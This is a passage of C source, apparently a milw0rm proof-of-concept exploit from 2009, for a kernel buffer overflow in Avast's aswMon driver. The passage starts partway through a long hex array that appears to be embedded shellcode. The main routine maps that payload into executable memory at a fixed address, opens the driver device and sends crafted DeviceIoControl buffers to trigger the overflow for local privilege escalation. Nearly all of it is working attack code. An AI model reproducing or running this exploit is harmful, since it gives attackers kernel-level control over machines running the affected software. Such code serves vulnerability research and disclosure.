0x946faaf6, 0xfcd89b65, + 0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92, + 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1, + 0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3, + 0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a, + 0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd, + 0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762, + 0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455, + 0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977, + 0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db, + 0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b, + 0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18, + 0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b, + 0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0, + 0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd, + 0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35, + 0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110, + 0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f, + 0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84, + 0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6, + 0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2, + 0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265, + 0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49, + 0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c, + 0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9, + 0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b, + 0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3, + 0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc, + 0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a, + 0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9, + 0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171, + 0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3, + 0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31, + 0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e, + 0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87, + 0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b, + 0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c, + 0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42, + 0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0, + 0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4, + 0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb, + 0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069, + 0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5, + 0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9, + 0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370, + 0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529, + 0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60, + 0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787, + 0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9, + 0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d, + 0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e, + 0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943, + 0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c, + 0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd, + 0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36, + 0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b, + 0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219, + 0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d, + 0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e, + 0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767, + 0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613, + 0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387, + 0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66, + 0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06, + 0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e, + 0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb, + 0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4, + 0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2, + 0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6, + 0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36, + 0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038, + 0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2, + 0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10, + 0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816, + 0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b, + 0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37, + 0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b, + 0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225, + 0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d, + 0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af, + 0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20, + 0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8, + 0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0, + 0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee, + 0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2, + 0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144, + 0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5, + 0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166, + 0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2, + 0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7, + 0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394, + 0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984, + 0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b, + 0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30, + 0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec, + 0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921, + 0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d, + 0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46, + 0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5, + 0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6, + 0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc, + 0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea, + 0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb, + 0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8, + 0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43, + 0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db, + 0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa, + 0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462, + 0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d, + 0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb, + 0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696, + 0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb, + 0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99, + 0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1, + 0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc, + 0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc, + 0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81, + 0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4, + 0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d, + 0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2, + 0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506, + 0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3, + 0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1, + 0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de, + 0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794, + 0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530, + 0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb, + 0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4, + 0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e, + 0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98, + 0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46, + 0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd, + 0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec, + 0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93, + 0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6, + 0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937, + 0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7, + 0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f, + 0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6, + 0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284, + 0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7, + 0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9, + 0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9, + 0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7, + 0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f, + 0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2, + 0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70, + 0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7, + 0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31, + 0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad, + 0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0, + 0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a, + 0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b, + 0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6, + 0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772, + 0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591, + 0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33, + 0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67, + 0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229, + 0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2, + 0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a, + 0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333, + 0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362, + 0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92, + 0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6, + 0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15, + 0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16, + 0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f, + 0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797, + 0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2, + 0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d, + 0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37, + 0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549, + 0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240, + 0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3, + 0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b, + 0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27, + 0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12, + 0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a, + 0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399, + 0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2, + 0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013, + 0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4, + 0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb, + 0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66, + 0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784, + 0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a, + 0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923, + 0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34, + 0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653, + 0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c, + 0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d, + 0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92, + 0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18, + 0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d, + 0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab, + 0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c, + 0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9, + 0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c, + 0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce, + 0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43, + 0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b, + 0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5, + 0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345, + 0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1, + 0xe8f62f56, 0x58f7969a + }; + + DWORD ShellcodeToExecute; + + int choix; + memset(welcome, 0x61, 100); + welcome[100] = 0; + + ZeroMemory(out,sizeof(out)); + + printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept...\n\n"); + getch(); + + MajShellcode("LocalEscalation_Avast.exe"); + MajRealShellcode(); + MajRealStack(); + + ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE); + ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon)); + memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster)); + + printf("Connecting... "); + + hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); + while(hDevice == (HANDLE) 0xffffffff){ + hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); + Sleep(1000); + } + printf("Found !\nHandle : %p\n",hDevice); + + DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL); + DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL); + AfficherListeFichiers(); + printf("Written.\n"); + + CloseHandle(hDevice); + getch(); + return 0; +} + +// milw0rm.com [2009-08-24]